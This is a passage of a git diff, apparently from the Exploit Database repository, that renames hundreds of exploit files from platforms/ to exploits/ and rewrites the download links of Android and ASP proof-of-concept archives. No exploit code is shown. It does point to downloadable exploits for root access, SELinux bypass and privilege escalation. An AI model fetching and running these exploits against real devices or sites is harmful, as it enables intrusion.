b/exploits/android/dos/41232.txt @@ -64,4 +64,4 @@ This PoC modifies an instruction within RKP's address space by repeatedly callin Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41232.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41232.zip \ No newline at end of file diff --git a/platforms/android/dos/41351.txt b/exploits/android/dos/41351.txt similarity index 96% rename from platforms/android/dos/41351.txt rename to exploits/android/dos/41351.txt index 6c49d45e1..30e0c19b7 100644 --- a/platforms/android/dos/41351.txt +++ b/exploits/android/dos/41351.txt @@ -63,4 +63,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41351.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41351.zip \ No newline at end of file diff --git a/platforms/android/dos/41352.txt b/exploits/android/dos/41352.txt similarity index 96% rename from platforms/android/dos/41352.txt rename to exploits/android/dos/41352.txt index efe11f726..95195f314 100644 --- a/platforms/android/dos/41352.txt +++ b/exploits/android/dos/41352.txt @@ -47,4 +47,4 @@ u:r:lghashstorageserver:s0 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41352.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41352.zip \ No newline at end of file diff --git a/platforms/android/dos/41353.txt b/exploits/android/dos/41353.txt similarity index 95% rename from platforms/android/dos/41353.txt rename to exploits/android/dos/41353.txt index 9086a093b..90fbecce5 100644 --- a/platforms/android/dos/41353.txt +++ b/exploits/android/dos/41353.txt @@ -92,4 +92,4 @@ disable selinux enforcement. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41353.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41353.zip \ No newline at end of file diff --git a/platforms/android/dos/41354.txt b/exploits/android/dos/41354.txt similarity index 98% rename from platforms/android/dos/41354.txt rename to exploits/android/dos/41354.txt index c4197104c..3a6b34e89 100644 --- a/platforms/android/dos/41354.txt +++ b/exploits/android/dos/41354.txt @@ -80,4 +80,4 @@ Here is a sample crash from a successful execution of the PoC: Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41354.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41354.zip \ No newline at end of file diff --git a/platforms/android/dos/41355.txt b/exploits/android/dos/41355.txt similarity index 98% rename from platforms/android/dos/41355.txt rename to exploits/android/dos/41355.txt index 10ee02d2d..15ab641ff 100644 --- a/platforms/android/dos/41355.txt +++ b/exploits/android/dos/41355.txt @@ -97,4 +97,4 @@ Here is a sample crash from a successful execution of the PoC: Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41355.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41355.zip \ No newline at end of file diff --git a/platforms/android/dos/41981.txt b/exploits/android/dos/41981.txt similarity index 97% rename from platforms/android/dos/41981.txt rename to exploits/android/dos/41981.txt index e240aabf0..249de65a9 100644 --- a/platforms/android/dos/41981.txt +++ b/exploits/android/dos/41981.txt @@ -79,4 +79,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41981.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41981.zip \ No newline at end of file diff --git a/platforms/android/dos/41982.txt b/exploits/android/dos/41982.txt similarity index 97% rename from platforms/android/dos/41982.txt rename to exploits/android/dos/41982.txt index 64b82f9d1..f2ee1ee46 100644 --- a/platforms/android/dos/41982.txt +++ b/exploits/android/dos/41982.txt @@ -53,4 +53,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41982.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41982.zip \ No newline at end of file diff --git a/platforms/android/dos/41983.txt b/exploits/android/dos/41983.txt similarity index 98% rename from platforms/android/dos/41983.txt rename to exploits/android/dos/41983.txt index 1022deee8..d6722b993 100644 --- a/platforms/android/dos/41983.txt +++ b/exploits/android/dos/41983.txt @@ -130,4 +130,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41983.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41983.zip \ No newline at end of file diff --git a/platforms/android/dos/42135.c b/exploits/android/dos/42135.c similarity index 100% rename from platforms/android/dos/42135.c rename to exploits/android/dos/42135.c diff --git a/platforms/android/dos/42169.txt b/exploits/android/dos/42169.txt similarity index 97% rename from platforms/android/dos/42169.txt rename to exploits/android/dos/42169.txt index b87170d7f..d9b09e78c 100644 --- a/platforms/android/dos/42169.txt +++ b/exploits/android/dos/42169.txt @@ -61,4 +61,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42169.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42169.zip \ No newline at end of file diff --git a/platforms/android/dos/42170.txt b/exploits/android/dos/42170.txt similarity index 96% rename from platforms/android/dos/42170.txt rename to exploits/android/dos/42170.txt index 1e5e44da4..e1eaa3d95 100644 --- a/platforms/android/dos/42170.txt +++ b/exploits/android/dos/42170.txt @@ -77,4 +77,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42170.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42170.zip \ No newline at end of file diff --git a/platforms/android/dos/42171.txt b/exploits/android/dos/42171.txt similarity index 97% rename from platforms/android/dos/42171.txt rename to exploits/android/dos/42171.txt index 5b696378b..f53c33724 100644 --- a/platforms/android/dos/42171.txt +++ b/exploits/android/dos/42171.txt @@ -41,4 +41,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42171.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42171.zip \ No newline at end of file diff --git a/platforms/android/dos/42285.txt b/exploits/android/dos/42285.txt similarity index 97% rename from platforms/android/dos/42285.txt rename to exploits/android/dos/42285.txt index 2841ba622..228890b77 100644 --- a/platforms/android/dos/42285.txt +++ b/exploits/android/dos/42285.txt @@ -23,4 +23,4 @@ backtrace: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42285.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42285.zip \ No newline at end of file diff --git a/platforms/android/local/16098.c b/exploits/android/local/16098.c similarity index 100% rename from platforms/android/local/16098.c rename to exploits/android/local/16098.c diff --git a/platforms/android/local/16099.c b/exploits/android/local/16099.c similarity index 100% rename from platforms/android/local/16099.c rename to exploits/android/local/16099.c diff --git a/platforms/android/local/32884.txt b/exploits/android/local/32884.txt similarity index 100% rename from platforms/android/local/32884.txt rename to exploits/android/local/32884.txt diff --git a/platforms/android/local/35711.c b/exploits/android/local/35711.c similarity index 100% rename from platforms/android/local/35711.c rename to exploits/android/local/35711.c diff --git a/platforms/android/local/39061.txt b/exploits/android/local/39061.txt similarity index 100% rename from platforms/android/local/39061.txt rename to exploits/android/local/39061.txt diff --git a/platforms/android/local/39340.cpp b/exploits/android/local/39340.cpp similarity index 100% rename from platforms/android/local/39340.cpp rename to exploits/android/local/39340.cpp diff --git a/platforms/android/local/39757.txt b/exploits/android/local/39757.txt similarity index 88% rename from platforms/android/local/39757.txt rename to exploits/android/local/39757.txt index 720ef85ba..b76f6cb74 100644 --- a/platforms/android/local/39757.txt +++ b/exploits/android/local/39757.txt @@ -6,4 +6,4 @@ Qualcomm's Secure Execution Environment (QSEE) Privilege Escalation Exploit usi Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39757.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39757.zip \ No newline at end of file diff --git a/platforms/android/local/40066.txt b/exploits/android/local/40066.txt similarity index 97% rename from platforms/android/local/40066.txt rename to exploits/android/local/40066.txt index 59c8fcd4c..d2ff52023 100644 --- a/platforms/android/local/40066.txt +++ b/exploits/android/local/40066.txt @@ -227,4 +227,4 @@ the JACK server process. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40066.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40066.zip \ No newline at end of file diff --git a/platforms/android/local/40504.rb b/exploits/android/local/40504.rb similarity index 100% rename from platforms/android/local/40504.rb rename to exploits/android/local/40504.rb diff --git a/platforms/android/local/40975.rb b/exploits/android/local/40975.rb similarity index 100% rename from platforms/android/local/40975.rb rename to exploits/android/local/40975.rb diff --git a/platforms/android/local/41130.txt b/exploits/android/local/41130.txt similarity index 97% rename from platforms/android/local/41130.txt rename to exploits/android/local/41130.txt index 0d8b35bbd..c61f105cc 100644 --- a/platforms/android/local/41130.txt +++ b/exploits/android/local/41130.txt @@ -70,4 +70,4 @@ The high-level flow for executing a function in the kernel is the following: Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41130.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41130.zip \ No newline at end of file diff --git a/platforms/android/local/41217.txt b/exploits/android/local/41217.txt similarity index 97% rename from platforms/android/local/41217.txt rename to exploits/android/local/41217.txt index 02e50b1a2..4c63afc08 100644 --- a/platforms/android/local/41217.txt +++ b/exploits/android/local/41217.txt @@ -92,4 +92,4 @@ This issue can be reproduced by simply writing code to any of these memory regio Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41217.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41217.zip \ No newline at end of file diff --git a/platforms/android/local/41675.rb b/exploits/android/local/41675.rb similarity index 100% rename from platforms/android/local/41675.rb rename to exploits/android/local/41675.rb diff --git a/platforms/android/local/42601.txt b/exploits/android/local/42601.txt similarity index 96% rename from platforms/android/local/42601.txt rename to exploits/android/local/42601.txt index a721c4404..a9d0d928a 100644 --- a/platforms/android/local/42601.txt +++ b/exploits/android/local/42601.txt @@ -28,4 +28,4 @@ cedric:/ # Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42601.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42601.zip \ No newline at end of file diff --git a/platforms/android/local/9477.txt b/exploits/android/local/9477.txt similarity index 74% rename from platforms/android/local/9477.txt rename to exploits/android/local/9477.txt index bb6e60800..5360d03a3 100644 --- a/platforms/android/local/9477.txt +++ b/exploits/android/local/9477.txt @@ -1,6 +1,6 @@ Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later. http://zenthought.org/content/file/android-root-2009-08-16-source -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9477.tar.gz (android-root-20090816.tar.gz) +Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9477.tar.gz (android-root-20090816.tar.gz) # milw0rm.com [2009-08-18] \ No newline at end of file diff --git a/platforms/android/remote/15423.html b/exploits/android/remote/15423.html similarity index 100% rename from platforms/android/remote/15423.html rename to exploits/android/remote/15423.html diff --git a/platforms/android/remote/15548.html b/exploits/android/remote/15548.html similarity index 100% rename from platforms/android/remote/15548.html rename to exploits/android/remote/15548.html diff --git a/platforms/android/remote/16974.html b/exploits/android/remote/16974.html similarity index 100% rename from platforms/android/remote/16974.html rename to exploits/android/remote/16974.html diff --git a/platforms/android/remote/18446.html b/exploits/android/remote/18446.html similarity index 100% rename from platforms/android/remote/18446.html rename to exploits/android/remote/18446.html diff --git a/platforms/android/remote/34088.html b/exploits/android/remote/34088.html similarity index 100% rename from platforms/android/remote/34088.html rename to exploits/android/remote/34088.html diff --git a/platforms/android/remote/35282.rb b/exploits/android/remote/35282.rb similarity index 100% rename from platforms/android/remote/35282.rb rename to exploits/android/remote/35282.rb diff --git a/platforms/android/remote/37792.txt b/exploits/android/remote/37792.txt similarity index 100% rename from platforms/android/remote/37792.txt rename to exploits/android/remote/37792.txt diff --git a/platforms/android/remote/37793.txt b/exploits/android/remote/37793.txt similarity index 100% rename from platforms/android/remote/37793.txt rename to exploits/android/remote/37793.txt diff --git a/platforms/android/remote/37794.txt b/exploits/android/remote/37794.txt similarity index 100% rename from platforms/android/remote/37794.txt rename to exploits/android/remote/37794.txt diff --git a/platforms/android/remote/37795.txt b/exploits/android/remote/37795.txt similarity index 100% rename from platforms/android/remote/37795.txt rename to exploits/android/remote/37795.txt diff --git a/platforms/android/remote/38124.py b/exploits/android/remote/38124.py similarity index 100% rename from platforms/android/remote/38124.py rename to exploits/android/remote/38124.py diff --git a/platforms/android/remote/38170.txt b/exploits/android/remote/38170.txt similarity index 100% rename from platforms/android/remote/38170.txt rename to exploits/android/remote/38170.txt diff --git a/platforms/android/remote/38226.py b/exploits/android/remote/38226.py similarity index 100% rename from platforms/android/remote/38226.py rename to exploits/android/remote/38226.py diff --git a/platforms/android/remote/38310.c b/exploits/android/remote/38310.c similarity index 100% rename from platforms/android/remote/38310.c rename to exploits/android/remote/38310.c diff --git a/platforms/android/remote/38554.py b/exploits/android/remote/38554.py similarity index 100% rename from platforms/android/remote/38554.py rename to exploits/android/remote/38554.py diff --git a/platforms/android/remote/38586.txt b/exploits/android/remote/38586.txt similarity index 100% rename from platforms/android/remote/38586.txt rename to exploits/android/remote/38586.txt diff --git a/platforms/android/remote/38627.sh b/exploits/android/remote/38627.sh similarity index 100% rename from platforms/android/remote/38627.sh rename to exploits/android/remote/38627.sh diff --git a/platforms/android/remote/38821.py b/exploits/android/remote/38821.py similarity index 100% rename from platforms/android/remote/38821.py rename to exploits/android/remote/38821.py diff --git a/platforms/android/remote/39328.rb b/exploits/android/remote/39328.rb similarity index 100% rename from platforms/android/remote/39328.rb rename to exploits/android/remote/39328.rb diff --git a/platforms/android/remote/39640.txt b/exploits/android/remote/39640.txt similarity index 95% rename from platforms/android/remote/39640.txt rename to exploits/android/remote/39640.txt index 2ad3bb3f6..6d531bfd0 100644 --- a/platforms/android/remote/39640.txt +++ b/exploits/android/remote/39640.txt @@ -24,4 +24,4 @@ Credits: To the NorthBit team E.P. - My shining paladin, for assisting in boosti Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39640.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39640.zip \ No newline at end of file diff --git a/platforms/android/remote/40354.txt b/exploits/android/remote/40354.txt similarity index 97% rename from platforms/android/remote/40354.txt rename to exploits/android/remote/40354.txt index a2f9bed44..dba0bb121 100644 --- a/platforms/android/remote/40354.txt +++ b/exploits/android/remote/40354.txt @@ -156,4 +156,4 @@ bool Parcel::enforceInterface(const String16& interface, Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40354.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40354.zip \ No newline at end of file diff --git a/platforms/android/remote/40436.rb b/exploits/android/remote/40436.rb similarity index 100% rename from platforms/android/remote/40436.rb rename to exploits/android/remote/40436.rb diff --git a/platforms/android/remote/40846.html b/exploits/android/remote/40846.html similarity index 100% rename from platforms/android/remote/40846.html rename to exploits/android/remote/40846.html diff --git a/platforms/android/remote/40874.txt b/exploits/android/remote/40874.txt similarity index 98% rename from platforms/android/remote/40874.txt rename to exploits/android/remote/40874.txt index d17e81dd4..37824d5ce 100644 --- a/platforms/android/remote/40874.txt +++ b/exploits/android/remote/40874.txt @@ -88,4 +88,4 @@ This notification will be of size THREAD_SIZE*2, and will therefore fill up the Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40874.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40874.zip \ No newline at end of file diff --git a/platforms/android/remote/42175.html b/exploits/android/remote/42175.html similarity index 100% rename from platforms/android/remote/42175.html rename to exploits/android/remote/42175.html diff --git a/platforms/android/remote/42287.txt b/exploits/android/remote/42287.txt similarity index 100% rename from platforms/android/remote/42287.txt rename to exploits/android/remote/42287.txt diff --git a/platforms/android/remote/42288.txt b/exploits/android/remote/42288.txt similarity index 100% rename from platforms/android/remote/42288.txt rename to exploits/android/remote/42288.txt diff --git a/platforms/android/remote/42289.txt b/exploits/android/remote/42289.txt similarity index 100% rename from platforms/android/remote/42289.txt rename to exploits/android/remote/42289.txt diff --git a/platforms/android/remote/42349.txt b/exploits/android/remote/42349.txt similarity index 100% rename from platforms/android/remote/42349.txt rename to exploits/android/remote/42349.txt diff --git a/platforms/android/remote/42350.txt b/exploits/android/remote/42350.txt similarity index 100% rename from platforms/android/remote/42350.txt rename to exploits/android/remote/42350.txt diff --git a/platforms/android/webapps/18164.php b/exploits/android/webapps/18164.php similarity index 100% rename from platforms/android/webapps/18164.php rename to exploits/android/webapps/18164.php diff --git a/platforms/android/webapps/37504.py b/exploits/android/webapps/37504.py similarity index 100% rename from platforms/android/webapps/37504.py rename to exploits/android/webapps/37504.py diff --git a/platforms/arm/dos/40182.txt b/exploits/arm/dos/40182.txt similarity index 97% rename from platforms/arm/dos/40182.txt rename to exploits/arm/dos/40182.txt index 362c3a0b3..36df2fe8f 100644 --- a/platforms/arm/dos/40182.txt +++ b/exploits/arm/dos/40182.txt @@ -78,4 +78,4 @@ I have attached a completely untested patch that should fix the x86, arm and arm Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40182.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40182.zip \ No newline at end of file diff --git a/platforms/arm/local/31574.c b/exploits/arm/local/31574.c similarity index 100% rename from platforms/arm/local/31574.c rename to exploits/arm/local/31574.c diff --git a/platforms/arm/local/33791.rb b/exploits/arm/local/33791.rb similarity index 100% rename from platforms/arm/local/33791.rb rename to exploits/arm/local/33791.rb diff --git a/platforms/arm/remote/41471.rb b/exploits/arm/remote/41471.rb similarity index 100% rename from platforms/arm/remote/41471.rb rename to exploits/arm/remote/41471.rb diff --git a/platforms/ashx/webapps/39497.txt b/exploits/ashx/webapps/39497.txt similarity index 100% rename from platforms/ashx/webapps/39497.txt rename to exploits/ashx/webapps/39497.txt diff --git a/platforms/asp/dos/12527.txt b/exploits/asp/dos/12527.txt similarity index 100% rename from platforms/asp/dos/12527.txt rename to exploits/asp/dos/12527.txt diff --git a/platforms/asp/dos/25962.xml b/exploits/asp/dos/25962.xml similarity index 100% rename from platforms/asp/dos/25962.xml rename to exploits/asp/dos/25962.xml diff --git a/platforms/asp/dos/27258.txt b/exploits/asp/dos/27258.txt similarity index 100% rename from platforms/asp/dos/27258.txt rename to exploits/asp/dos/27258.txt diff --git a/platforms/asp/dos/35154.txt b/exploits/asp/dos/35154.txt similarity index 100% rename from platforms/asp/dos/35154.txt rename to exploits/asp/dos/35154.txt diff --git a/platforms/asp/remote/15213.pl b/exploits/asp/remote/15213.pl similarity index 95% rename from platforms/asp/remote/15213.pl rename to exploits/asp/remote/15213.pl index db278870f..1ad21065f 100755 --- a/platforms/asp/remote/15213.pl +++ b/exploits/asp/remote/15213.pl @@ -10,7 +10,7 @@ # Note from Exploit-db: This very first exploit was meant to work with Padbusterdornet or Padbuster v0.2. # A similar exploitation vector was also added lately in Padbuster v0.3: # http://www.gdssecurity.com/l/b/2010/10/04/padbuster-v0-3-and-the-net-padding-oracle-attack/ -# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15213.pl (padBuster.pl) +# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/15213.pl (padBuster.pl) # # # Giorgio Fedon - (giorgio.fedon@mindedsecurity.com) diff --git a/platforms/asp/remote/15265.rb b/exploits/asp/remote/15265.rb similarity index 100% rename from platforms/asp/remote/15265.rb rename to exploits/asp/remote/15265.rb diff --git a/platforms/asp/remote/27861.txt b/exploits/asp/remote/27861.txt similarity index 100% rename from platforms/asp/remote/27861.txt rename to exploits/asp/remote/27861.txt diff --git a/platforms/asp/remote/27862.txt b/exploits/asp/remote/27862.txt similarity index 100% rename from platforms/asp/remote/27862.txt rename to exploits/asp/remote/27862.txt diff --git a/platforms/asp/webapps/1010.pl b/exploits/asp/webapps/1010.pl similarity index 100% rename from platforms/asp/webapps/1010.pl rename to exploits/asp/webapps/1010.pl diff --git a/platforms/asp/webapps/1011.php b/exploits/asp/webapps/1011.php similarity index 100% rename from platforms/asp/webapps/1011.php rename to exploits/asp/webapps/1011.php diff --git a/platforms/asp/webapps/1012.txt b/exploits/asp/webapps/1012.txt similarity index 100% rename from platforms/asp/webapps/1012.txt rename to exploits/asp/webapps/1012.txt diff --git a/platforms/asp/webapps/1015.txt b/exploits/asp/webapps/1015.txt similarity index 100% rename from platforms/asp/webapps/1015.txt rename to exploits/asp/webapps/1015.txt diff --git a/platforms/asp/webapps/10161.txt b/exploits/asp/webapps/10161.txt similarity index 100% rename from platforms/asp/webapps/10161.txt rename to exploits/asp/webapps/10161.txt diff --git a/platforms/asp/webapps/10166.txt b/exploits/asp/webapps/10166.txt similarity index 100% rename from platforms/asp/webapps/10166.txt rename to exploits/asp/webapps/10166.txt diff --git a/platforms/asp/webapps/10167.txt b/exploits/asp/webapps/10167.txt similarity index 100% rename from platforms/asp/webapps/10167.txt rename to exploits/asp/webapps/10167.txt diff --git a/platforms/asp/webapps/10253.txt b/exploits/asp/webapps/10253.txt similarity index 100% rename from platforms/asp/webapps/10253.txt rename to exploits/asp/webapps/10253.txt diff --git a/platforms/asp/webapps/10254.txt b/exploits/asp/webapps/10254.txt similarity index 100% rename from platforms/asp/webapps/10254.txt rename to exploits/asp/webapps/10254.txt diff --git a/platforms/asp/webapps/10368.txt b/exploits/asp/webapps/10368.txt similarity index 100% rename from platforms/asp/webapps/10368.txt rename to exploits/asp/webapps/10368.txt diff --git a/platforms/asp/webapps/10425.txt b/exploits/asp/webapps/10425.txt similarity index 100% rename from platforms/asp/webapps/10425.txt rename to exploits/asp/webapps/10425.txt diff --git a/platforms/asp/webapps/10449.txt b/exploits/asp/webapps/10449.txt similarity index 100% rename from platforms/asp/webapps/10449.txt rename to exploits/asp/webapps/10449.txt diff --git a/platforms/asp/webapps/10455.txt b/exploits/asp/webapps/10455.txt similarity index 100% rename from platforms/asp/webapps/10455.txt rename to exploits/asp/webapps/10455.txt diff --git a/platforms/asp/webapps/10456.txt b/exploits/asp/webapps/10456.txt similarity index 100% rename from platforms/asp/webapps/10456.txt rename to exploits/asp/webapps/10456.txt diff --git a/platforms/asp/webapps/10457.txt b/exploits/asp/webapps/10457.txt similarity index 100% rename from platforms/asp/webapps/10457.txt rename to exploits/asp/webapps/10457.txt diff --git a/platforms/asp/webapps/10464.txt b/exploits/asp/webapps/10464.txt similarity index 100% rename from platforms/asp/webapps/10464.txt rename to exploits/asp/webapps/10464.txt diff --git a/platforms/asp/webapps/10465.txt b/exploits/asp/webapps/10465.txt similarity index 100% rename from platforms/asp/webapps/10465.txt rename to exploits/asp/webapps/10465.txt diff --git a/platforms/asp/webapps/10470.txt b/exploits/asp/webapps/10470.txt similarity index 100% rename from platforms/asp/webapps/10470.txt rename to exploits/asp/webapps/10470.txt diff --git a/platforms/asp/webapps/10473.txt b/exploits/asp/webapps/10473.txt similarity index 100% rename from platforms/asp/webapps/10473.txt rename to exploits/asp/webapps/10473.txt diff --git a/platforms/asp/webapps/10476.txt b/exploits/asp/webapps/10476.txt similarity index 100% rename from platforms/asp/webapps/10476.txt rename to exploits/asp/webapps/10476.txt diff --git a/platforms/asp/webapps/10482.txt b/exploits/asp/webapps/10482.txt similarity index 100% rename from platforms/asp/webapps/10482.txt rename to exploits/asp/webapps/10482.txt diff --git a/platforms/asp/webapps/10483.txt b/exploits/asp/webapps/10483.txt similarity index 100% rename from platforms/asp/webapps/10483.txt rename to exploits/asp/webapps/10483.txt diff --git a/platforms/asp/webapps/10496.txt b/exploits/asp/webapps/10496.txt similarity index 100% rename from platforms/asp/webapps/10496.txt rename to exploits/asp/webapps/10496.txt diff --git a/platforms/asp/webapps/10501.txt b/exploits/asp/webapps/10501.txt similarity index 100% rename from platforms/asp/webapps/10501.txt rename to exploits/asp/webapps/10501.txt diff --git a/platforms/asp/webapps/10502.txt b/exploits/asp/webapps/10502.txt similarity index 100% rename from platforms/asp/webapps/10502.txt rename to exploits/asp/webapps/10502.txt diff --git a/platforms/asp/webapps/10503.txt b/exploits/asp/webapps/10503.txt similarity index 100% rename from platforms/asp/webapps/10503.txt rename to exploits/asp/webapps/10503.txt diff --git a/platforms/asp/webapps/10504.txt b/exploits/asp/webapps/10504.txt similarity index 100% rename from platforms/asp/webapps/10504.txt rename to exploits/asp/webapps/10504.txt diff --git a/platforms/asp/webapps/10505.txt b/exploits/asp/webapps/10505.txt similarity index 100% rename from platforms/asp/webapps/10505.txt rename to exploits/asp/webapps/10505.txt diff --git a/platforms/asp/webapps/10507.txt b/exploits/asp/webapps/10507.txt similarity index 100% rename from platforms/asp/webapps/10507.txt rename to exploits/asp/webapps/10507.txt diff --git a/platforms/asp/webapps/10520.txt b/exploits/asp/webapps/10520.txt similarity index 100% rename from platforms/asp/webapps/10520.txt rename to exploits/asp/webapps/10520.txt diff --git a/platforms/asp/webapps/10525.txt b/exploits/asp/webapps/10525.txt similarity index 100% rename from platforms/asp/webapps/10525.txt rename to exploits/asp/webapps/10525.txt diff --git a/platforms/asp/webapps/10526.txt b/exploits/asp/webapps/10526.txt similarity index 100% rename from platforms/asp/webapps/10526.txt rename to exploits/asp/webapps/10526.txt diff --git a/platforms/asp/webapps/10529.txt b/exploits/asp/webapps/10529.txt similarity index 100% rename from platforms/asp/webapps/10529.txt rename to exploits/asp/webapps/10529.txt diff --git a/platforms/asp/webapps/10540.txt b/exploits/asp/webapps/10540.txt similarity index 100% rename from platforms/asp/webapps/10540.txt rename to exploits/asp/webapps/10540.txt diff --git a/platforms/asp/webapps/10558.txt b/exploits/asp/webapps/10558.txt similarity index 100% rename from platforms/asp/webapps/10558.txt rename to exploits/asp/webapps/10558.txt diff --git a/platforms/asp/webapps/10573.txt b/exploits/asp/webapps/10573.txt similarity index 100% rename from platforms/asp/webapps/10573.txt rename to exploits/asp/webapps/10573.txt diff --git a/platforms/asp/webapps/10576.txt b/exploits/asp/webapps/10576.txt similarity index 100% rename from platforms/asp/webapps/10576.txt rename to exploits/asp/webapps/10576.txt diff --git a/platforms/asp/webapps/10582.txt b/exploits/asp/webapps/10582.txt similarity index 100% rename from platforms/asp/webapps/10582.txt rename to exploits/asp/webapps/10582.txt diff --git a/platforms/asp/webapps/10637.txt b/exploits/asp/webapps/10637.txt similarity index 100% rename from platforms/asp/webapps/10637.txt rename to exploits/asp/webapps/10637.txt diff --git a/platforms/asp/webapps/10638.txt b/exploits/asp/webapps/10638.txt similarity index 100% rename from platforms/asp/webapps/10638.txt rename to exploits/asp/webapps/10638.txt diff --git a/platforms/asp/webapps/10639.txt b/exploits/asp/webapps/10639.txt similarity index 100% rename from platforms/asp/webapps/10639.txt rename to exploits/asp/webapps/10639.txt diff --git a/platforms/asp/webapps/10686.txt b/exploits/asp/webapps/10686.txt similarity index 100% rename from platforms/asp/webapps/10686.txt rename to exploits/asp/webapps/10686.txt diff --git a/platforms/asp/webapps/1070.pl b/exploits/asp/webapps/1070.pl similarity index 100% rename from platforms/asp/webapps/1070.pl rename to exploits/asp/webapps/1070.pl diff --git a/platforms/asp/webapps/1071.pl b/exploits/asp/webapps/1071.pl similarity index 100% rename from platforms/asp/webapps/1071.pl rename to exploits/asp/webapps/1071.pl diff --git a/platforms/asp/webapps/10713.txt b/exploits/asp/webapps/10713.txt similarity index 100% rename from platforms/asp/webapps/10713.txt rename to exploits/asp/webapps/10713.txt diff --git a/platforms/asp/webapps/10767.txt b/exploits/asp/webapps/10767.txt similarity index 100% rename from platforms/asp/webapps/10767.txt rename to exploits/asp/webapps/10767.txt diff --git a/platforms/asp/webapps/10770.txt b/exploits/asp/webapps/10770.txt similarity index 100% rename from platforms/asp/webapps/10770.txt rename to exploits/asp/webapps/10770.txt diff --git a/platforms/asp/webapps/10771.txt b/exploits/asp/webapps/10771.txt similarity index 100% rename from platforms/asp/webapps/10771.txt rename to exploits/asp/webapps/10771.txt diff --git a/platforms/asp/webapps/10772.txt b/exploits/asp/webapps/10772.txt similarity index 100% rename from platforms/asp/webapps/10772.txt rename to exploits/asp/webapps/10772.txt diff --git a/platforms/asp/webapps/10773.txt b/exploits/asp/webapps/10773.txt similarity index 100% rename from platforms/asp/webapps/10773.txt rename to exploits/asp/webapps/10773.txt diff --git a/platforms/asp/webapps/10774.txt b/exploits/asp/webapps/10774.txt similarity index 100% rename from platforms/asp/webapps/10774.txt rename to exploits/asp/webapps/10774.txt diff --git a/platforms/asp/webapps/10775.txt b/exploits/asp/webapps/10775.txt similarity index 100% rename from platforms/asp/webapps/10775.txt rename to exploits/asp/webapps/10775.txt diff --git a/platforms/asp/webapps/10776.txt b/exploits/asp/webapps/10776.txt similarity index 100% rename from platforms/asp/webapps/10776.txt rename to exploits/asp/webapps/10776.txt diff --git a/platforms/asp/webapps/10777.txt b/exploits/asp/webapps/10777.txt similarity index 